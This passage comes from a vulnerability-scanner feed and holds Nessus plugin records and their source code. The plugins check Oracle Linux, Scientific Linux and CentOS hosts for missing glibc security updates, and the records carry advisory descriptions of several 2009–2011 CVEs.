(CVE-2009-5029)\n\nA flaw was found in the way the ldd utility identified dynamically\nlinked libraries. If an attacker could trick a user into running ldd\non a malicious binary, it could result in arbitrary code execution\nwith the privileges of the user running ldd. (CVE-2009-5064)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library loaded ELF (Executable and Linking\nFormat) files. If a carefully-crafted ELF file was loaded by an\napplication linked against glibc, it could cause the application to\ncrash or, potentially, execute arbitrary code with the privileges of\nthe user running the application. (CVE-2010-0830)\n\nIt was found that the glibc addmntent() function, used by various\nmount helper utilities, did not handle certain errors correctly when\nupdating the mtab (mounted file systems table) file. If such utilities\nhad the setuid bit set, a local attacker could use this flaw to\ncorrupt the mtab file. (CVE-2011-1089)\n\nA denial of service flaw was found in the remote procedure call (RPC)\nimplementation in glibc. A remote attacker able to open a large number\nof connections to an RPC service that is using the RPC implementation\nfrom glibc, could use this flaw to make that service use an excessive\namount of CPU time. (CVE-2011-4609)\n\nRed Hat would like to thank the Ubuntu Security Team for reporting\nCVE-2010-0830, and Dan Rosenberg for reporting CVE-2011-1089. The\nUbuntu Security Team acknowledges Dan Rosenberg as the original\nreporter of CVE-2010-0830.\n\nUsers should upgrade to these updated packages, which resolve these\nissues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2012-February/002608.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected glibc packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/06/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/02/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 5\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL5\", reference:\"glibc-2.5-65.el5_7.3\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"glibc-common-2.5-65.el5_7.3\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"glibc-devel-2.5-65.el5_7.3\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"glibc-headers-2.5-65.el5_7.3\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"glibc-utils-2.5-65.el5_7.3\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"nscd-2.5-65.el5_7.3\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-devel / glibc-headers / glibc-utils / etc\");\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T13:46:22", "description": "The glibc packages contain the standard C libraries used by multiple\nprograms on the system. These packages contain the standard C and the\nstandard math libraries. Without these two libraries, a Linux system\ncannot function properly.\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library read timezone files. If a\ncarefully-crafted timezone file was loaded by an application linked\nagainst glibc, it could cause the application to crash or,\npotentially, execute arbitrary code with the privileges of the user\nrunning the application. (CVE-2009-5029)\n\nA flaw was found in the way the ldd utility identified dynamically\nlinked libraries. If an attacker could trick a user into running ldd\non a malicious binary, it could result in arbitrary code execution\nwith the privileges of the user running ldd. (CVE-2009-5064)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library loaded ELF (Executable and Linking\nFormat) files. If a carefully-crafted ELF file was loaded by an\napplication linked against glibc, it could cause the application to\ncrash or, potentially, execute arbitrary code with the privileges of\nthe user running the application. (CVE-2010-0830)\n\nIt was found that the glibc addmntent() function, used by various\nmount helper utilities, did not handle certain errors correctly when\nupdating the mtab (mounted file systems table) file. If such utilities\nhad the setuid bit set, a local attacker could use this flaw to\ncorrupt the mtab file. (CVE-2011-1089)\n\nA denial of service flaw was found in the remote procedure call (RPC)\nimplementation in glibc. A remote attacker able to open a large number\nof connections to an RPC service that is using the RPC implementation\nfrom glibc, could use this flaw to make that service use an excessive\namount of CPU time. (CVE-2011-4609)\n\nUsers should upgrade to these updated packages, which resolve these\nissues.", "edition": 14, "published": "2012-08-01T00:00:00", "title": "Scientific Linux Security Update : glibc on SL5.x i386/x86_64 (20120213)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4609", "CVE-2010-0830", "CVE-2009-5029", "CVE-2011-1089", "CVE-2009-5064"], "modified": "2012-08-01T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:glibc-debuginfo-common", "p-cpe:/a:fermilab:scientific_linux:glibc", "p-cpe:/a:fermilab:scientific_linux:glibc-common", "p-cpe:/a:fermilab:scientific_linux:glibc-devel", "p-cpe:/a:fermilab:scientific_linux:nscd", "p-cpe:/a:fermilab:scientific_linux:glibc-debuginfo", "x-cpe:/o:fermilab:scientific_linux", "p-cpe:/a:fermilab:scientific_linux:glibc-utils", "p-cpe:/a:fermilab:scientific_linux:glibc-headers"], "id": "SL_20120213_GLIBC_ON_SL5_X.NASL", "href": "https://www.tenable.com/plugins/nessus/61244", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(61244);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-5029\", \"CVE-2009-5064\", \"CVE-2010-0830\", \"CVE-2011-1089\", \"CVE-2011-4609\");\n\n script_name(english:\"Scientific Linux Security Update : glibc on SL5.x i386/x86_64 (20120213)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The glibc packages contain the standard C libraries used by multiple\nprograms on the system. These packages contain the standard C and the\nstandard math libraries. Without these two libraries, a Linux system\ncannot function properly.\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library read timezone files. If a\ncarefully-crafted timezone file was loaded by an application linked\nagainst glibc, it could cause the application to crash or,\npotentially, execute arbitrary code with the privileges of the user\nrunning the application. (CVE-2009-5029)\n\nA flaw was found in the way the ldd utility identified dynamically\nlinked libraries. If an attacker could trick a user into running ldd\non a malicious binary, it could result in arbitrary code execution\nwith the privileges of the user running ldd. (CVE-2009-5064)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library loaded ELF (Executable and Linking\nFormat) files. If a carefully-crafted ELF file was loaded by an\napplication linked against glibc, it could cause the application to\ncrash or, potentially, execute arbitrary code with the privileges of\nthe user running the application. (CVE-2010-0830)\n\nIt was found that the glibc addmntent() function, used by various\nmount helper utilities, did not handle certain errors correctly when\nupdating the mtab (mounted file systems table) file. If such utilities\nhad the setuid bit set, a local attacker could use this flaw to\ncorrupt the mtab file. (CVE-2011-1089)\n\nA denial of service flaw was found in the remote procedure call (RPC)\nimplementation in glibc. A remote attacker able to open a large number\nof connections to an RPC service that is using the RPC implementation\nfrom glibc, could use this flaw to make that service use an excessive\namount of CPU time. (CVE-2011-4609)\n\nUsers should upgrade to these updated packages, which resolve these\nissues.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1202&L=scientific-linux-errata&T=0&P=2446\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b70164f6\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc-debuginfo-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/06/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/02/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 5.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL5\", reference:\"glibc-2.5-65.el5_7.3\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"glibc-common-2.5-65.el5_7.3\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"glibc-debuginfo-2.5-65.el5_7.3\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"glibc-debuginfo-common-2.5-65.el5_7.3\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"glibc-devel-2.5-65.el5_7.3\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"glibc-headers-2.5-65.el5_7.3\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"glibc-utils-2.5-65.el5_7.3\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"nscd-2.5-65.el5_7.3\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-debuginfo / glibc-debuginfo-common / etc\");\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T09:27:30", "description": "Updated glibc packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe glibc packages contain the standard C libraries used by multiple\nprograms on the system. These packages contain the standard C and the\nstandard math libraries. Without these two libraries, a Linux system\ncannot function properly.\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library read timezone files. If a\ncarefully-crafted timezone file was loaded by an application linked\nagainst glibc, it could cause the application to crash or,\npotentially, execute arbitrary code with the privileges of the user\nrunning the application. (CVE-2009-5029)\n\nA flaw was found in the way the ldd utility identified dynamically\nlinked libraries. If an attacker could trick a user into running ldd\non a malicious binary, it could result in arbitrary code execution\nwith the privileges of the user running ldd. (CVE-2009-5064)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library loaded ELF (Executable and Linking\nFormat) files. If a carefully-crafted ELF file was loaded by an\napplication linked against glibc, it could cause the application to\ncrash or, potentially, execute arbitrary code with the privileges of\nthe user running the application. (CVE-2010-0830)\n\nIt was found that the glibc addmntent() function, used by various\nmount helper utilities, did not handle certain errors correctly when\nupdating the mtab (mounted file systems table) file. If such utilities\nhad the setuid bit set, a local attacker could use this flaw to\ncorrupt the mtab file. (CVE-2011-1089)\n\nA denial of service flaw was found in the remote procedure call (RPC)\nimplementation in glibc. A remote attacker able to open a large number\nof connections to an RPC service that is using the RPC implementation\nfrom glibc, could use this flaw to make that service use an excessive\namount of CPU time. (CVE-2011-4609)\n\nRed Hat would like to thank the Ubuntu Security Team for reporting\nCVE-2010-0830, and Dan Rosenberg for reporting CVE-2011-1089. The\nUbuntu Security Team acknowledges Dan Rosenberg as the original\nreporter of CVE-2010-0830.\n\nUsers should upgrade to these updated packages, which resolve these\nissues.", "edition": 25, "published": "2012-02-14T00:00:00", "title": "CentOS 5 : glibc (CESA-2012:0126)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4609", "CVE-2010-0830", "CVE-2009-5029", "CVE-2011-1089", "CVE-2009-5064"], "modified": "2012-02-14T00:00:00", "cpe": ["p-cpe:/a:centos:centos:glibc-common", "p-cpe:/a:centos:centos:nscd", "p-cpe:/a:centos:centos:glibc-utils", "p-cpe:/a:centos:centos:glibc-devel", "p-cpe:/a:centos:centos:glibc-headers", "cpe:/o:centos:centos:5", "p-cpe:/a:centos:centos:glibc"], "id": "CENTOS_RHSA-2012-0126.NASL", "href": "https://www.tenable.com/plugins/nessus/57924", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2012:0126 and \n# CentOS Errata and Security Advisory 2012:0126 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(57924);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2009-5029\", \"CVE-2009-5064\", \"CVE-2010-0830\", \"CVE-2011-1089\", \"CVE-2011-4609\");\n script_bugtraq_id(40063, 46740, 50898, 51439);\n script_xref(name:\"RHSA\", value:\"2012:0126\");\n\n script_name(english:\"CentOS 5 : glibc (CESA-2012:0126)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated glibc packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe glibc packages contain the standard C libraries used by multiple\nprograms on the system. These packages contain the standard C and the\nstandard math libraries. Without these two libraries, a Linux system\ncannot function properly.\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library read timezone files. If a\ncarefully-crafted timezone file was loaded by an application linked\nagainst glibc, it could cause the application to crash or,\npotentially, execute arbitrary code with the privileges of the user\nrunning the application. (CVE-2009-5029)\n\nA flaw was found in the way the ldd utility identified dynamically\nlinked libraries. If an attacker could trick a user into running ldd\non a malicious binary, it could result in arbitrary code execution\nwith the privileges of the user running ldd. (CVE-2009-5064)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library loaded ELF (Executable and Linking\nFormat) files. If a carefully-crafted ELF file was loaded by an\napplication linked against glibc, it could cause the application to\ncrash or, potentially, execute arbitrary code with the privileges of\nthe user running the application. (CVE-2010-0830)\n\nIt was found that the glibc addmntent() function, used by various\nmount helper utilities, did not handle certain errors correctly when\nupdating the mtab (mounted file systems table) file. If such utilities\nhad the setuid bit set, a local attacker could use this flaw to\ncorrupt the mtab file. (CVE-2011-1089)\n\nA denial of service flaw was found in the remote procedure call (RPC)\nimplementation in glibc. A remote attacker able to open a large number\nof connections to an RPC service that is using the RPC implementation\nfrom glibc, could use this flaw to make that service use an excessive\namount of CPU time. (CVE-2011-4609)\n\nRed Hat would like to thank the Ubuntu Security Team for reporting\nCVE-2010-0830, and Dan Rosenberg for reporting CVE-2011-1089. The\nUbuntu Security Team acknowledges Dan Rosenberg as the original\nreporter of CVE-2010-0830.\n\nUsers should upgrade to these updated packages, which resolve these\nissues.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2012-February/018428.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e48699c2\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected glibc packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2009-5064\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/06/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/02/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/02/14\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 5.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-5\", reference:\"glibc-2.5-65.el5_7.3\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"glibc-common-2.5-65.el5_7.3\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"glibc-devel-2.5-65.el5_7.3\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"glibc-headers-2.5-65.el5_7.3\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"glibc-utils-2.5-65.el5_7.3\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"nscd-2.5-65.el5_7.3\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-devel / glibc-headers / glibc-utils / etc\");\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T12:46:41", "description": "From Red Hat Security Advisory 2012:0125 :\n\nUpdated glibc packages that fix multiple security issues and one bug\nare now available for Red Hat Enterprise Linux 4.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe glibc packages contain the standard C libraries used by multiple\nprograms on the system. These packages contain the standard C and the\nstandard math libraries. Without these two libraries, a Linux system\ncannot function properly.\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library read timezone files. If a\ncarefully-crafted timezone file was loaded by an application linked\nagainst glibc, it could cause the application to crash or,\npotentially, execute arbitrary code with the privileges of the user\nrunning the application. (CVE-2009-5029)\n\nA flaw was found in the way the ldd utility identified dynamically\nlinked libraries. If an attacker could trick a user into running ldd\non a malicious binary, it could result in arbitrary code execution\nwith the privileges of the user running ldd. (CVE-2009-5064)\n\nIt was discovered that the glibc addmntent() function, used by various\nmount helper utilities, did not sanitize its input properly. A local\nattacker could possibly use this flaw to inject malformed lines into\nthe mtab (mounted file systems table) file via certain setuid mount\nhelpers, if the attacker were allowed to mount to an arbitrary\ndirectory under their control. (CVE-2010-0296)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library loaded ELF (Executable and Linking\nFormat) files. If a carefully-crafted ELF file was loaded by an\napplication linked against glibc, it could cause the application to\ncrash or, potentially, execute arbitrary code with the privileges of\nthe user running the application. (CVE-2010-0830)\n\nIt was discovered that the glibc fnmatch() function did not properly\nrestrict the use of alloca(). If the function was called on\nsufficiently large inputs, it could cause an application using\nfnmatch() to crash or, possibly, execute arbitrary code with the\nprivileges of the application. (CVE-2011-1071)\n\nIt was found that the glibc addmntent() function, used by various\nmount helper utilities, did not handle certain errors correctly when\nupdating the mtab (mounted file systems table) file. If such utilities\nhad the setuid bit set, a local attacker could use this flaw to\ncorrupt the mtab file. (CVE-2011-1089)\n\nIt was discovered that the locale command did not produce properly\nescaped output as required by the POSIX specification. If an attacker\nwere able to set the locale environment variables in the environment\nof a script that performed shell evaluation on the output of the\nlocale command, and that script were run with different privileges\nthan the attacker's, it could execute arbitrary code with the\nprivileges of the script. (CVE-2011-1095)\n\nAn integer overflow flaw was found in the glibc fnmatch() function. If\nan attacker supplied a long UTF-8 string to an application linked\nagainst glibc, it could cause the application to crash.\n(CVE-2011-1659)\n\nA denial of service flaw was found in the remote procedure call (RPC)\nimplementation in glibc. A remote attacker able to open a large number\nof connections to an RPC service that is using the RPC implementation\nfrom glibc, could use this flaw to make that service use an excessive\namount of CPU time. (CVE-2011-4609)\n\nRed Hat would like to thank the Ubuntu Security Team for reporting\nCVE-2010-0830, and Dan Rosenberg for reporting CVE-2011-1089. The\nUbuntu Security Team acknowledges Dan Rosenberg as the original\nreporter of CVE-2010-0830.\n\nThis update also fixes the following bug :\n\n* When using an nscd package that is a different version than the\nglibc package, the nscd service could fail to start. This update makes\nthe nscd package require a specific glibc version to prevent this\nproblem. (BZ#657009)\n\nUsers should upgrade to these updated packages, which resolve these\nissues.", "edition": 22, "published": "2013-07-12T00:00:00", "title": "Oracle Linux 4 : glibc (ELSA-2012-0125)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4609", "CVE-2010-0296", "CVE-2011-1659", "CVE-2010-0830", "CVE-2011-1071", "CVE-2011-1095", "CVE-2009-5029", "CVE-2011-1089", "CVE-2009-5064"], "modified": "2013-07-12T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:nscd", "p-cpe:/a:oracle:linux:nptl-devel", "p-cpe:/a:oracle:linux:glibc-profile", "p-cpe:/a:oracle:linux:glibc-devel", "cpe:/o:oracle:linux:4", "p-cpe:/a:oracle:linux:glibc-utils", "p-cpe:/a:oracle:linux:glibc-headers", "p-cpe:/a:oracle:linux:glibc-common", "p-cpe:/a:oracle:linux:glibc"], "id": "ORACLELINUX_ELSA-2012-0125.NASL", "href": "https://www.tenable.com/plugins/nessus/68455", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2012:0125 and \n# Oracle Linux Security Advisory ELSA-2012-0125 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(68455);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-5029\", \"CVE-2009-5064\", \"CVE-2010-0296\", \"CVE-2010-0830\", \"CVE-2011-1071\", \"CVE-2011-1089\", \"CVE-2011-1095\", \"CVE-2011-1659\", 